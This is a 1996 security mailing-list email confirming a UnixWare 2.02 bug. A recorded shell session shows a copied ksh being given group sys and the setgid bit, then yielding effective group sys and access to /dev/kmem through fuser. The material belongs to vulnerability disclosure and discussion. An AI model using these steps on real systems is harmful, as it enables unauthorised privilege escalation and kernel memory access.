From mib@ppe.bb-data.de Mon Sep 2 21:17:08 1996 Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id VAA14088 for ; Mon, 2 Sep 1996 21:15:31 +1000 Received: from daiquiri.bb-data.de (firewall-user@daiquiri.bankgesellschaft.de [193.31.178.49]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id XAA08070 for ; Sun, 1 Sep 1996 23:10:13 -0700 (PDT) Received: by daiquiri.bb-data.de; id IAA20757; Mon, 2 Sep 1996 08:06:32 +0200 Received: from ginfizz.bb-data.de(193.31.178.35) by daiquiri.bb-data.de via smap (g3.0.3) id xma020751; Mon, 2 Sep 96 08:06:16 +0200 Received: by bb-data.de (/\oo/\ Smail3.1.29.1 #29.5) id ; Mon, 2 Sep 96 08:06 MET DST Received: by ppe.bb-data.de (/\==/\ Smail3.1.28.1 #28.10) id ; Mon, 2 Sep 96 08:07 MET DST Message-ID: <322A796F.F60@ppe.bb-data.de> Date: Mon, 02 Sep 1996 08:06:39 +0200 From: Martin Ibert Organization: BB-DATA GmbH, Berlin, Germany X-Mailer: Mozilla 2.02 (WinNT; I) MIME-Version: 1.0 To: "Justin M. Collins" CC: best-of-security@suburbia.net Subject: Re: BoS: More on the UnixWare problem References: <199609011421.AAA19562@suburbia.net> <9609011222.ZM22492@firestorm.servtech.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Justin M. Collins wrote: > If I am missing something please let me know.. but according to > what I did above the bug does not exist. Maybe it doesn't on your version, but our 2.02 system does exhibit it: Script started on Mon Sep 2 08:00:35 1996 mib@wesley:pts001 ~ % cp /usr/bin/ksh . mib@wesley:pts001 ~ % ls -l ksh -r-xr-xr-x 1 mib avs 135632 Sep 2 08:00 ksh mib@wesley:pts001 ~ % chgrp sys ksh mib@wesley:pts001 ~ % ls -l ksh -r-xr-xr-x 1 mib sys 135632 Sep 2 08:00 ksh mib@wesley:pts001 ~ % chmod 2700 ksh mib@wesley:pts001 ~ % ls -l ksh -rwx--l--- 1 mib sys 135632 Sep 2 08:00 ksh mib@wesley:pts001 ~ % ./ksh mib-wesley-/home/mib> id uid=20077(mib) gid=20010(avs) egid=3(sys) mib-wesley-/home/mib> fuser ./ksh ./ksh: 4446t mib-wesley-/home/mib> exit mib@wesley:pts001 ~ % fuser ./ksh UX:fuser: ERROR: open of /dev/kmem failed: Permission denied zsh: 4449 exit 1 fuser ./ksh mib@wesley:pts001 ~ % exit script done on Mon Sep 2 08:01:27 1996 As you can see, the hacked ksh let me do something that my regular login shell won't. (fuser(1M)ing a file.) -- --------------------------------------------------------------------------- Dipl.-Inform. Martin Ibert, BB-DATA GmbH, Brunnenstra_e 111, D-13355 Berlin E-Mail - Phone +49-30-245-56582 - Fax +49-30-245-56577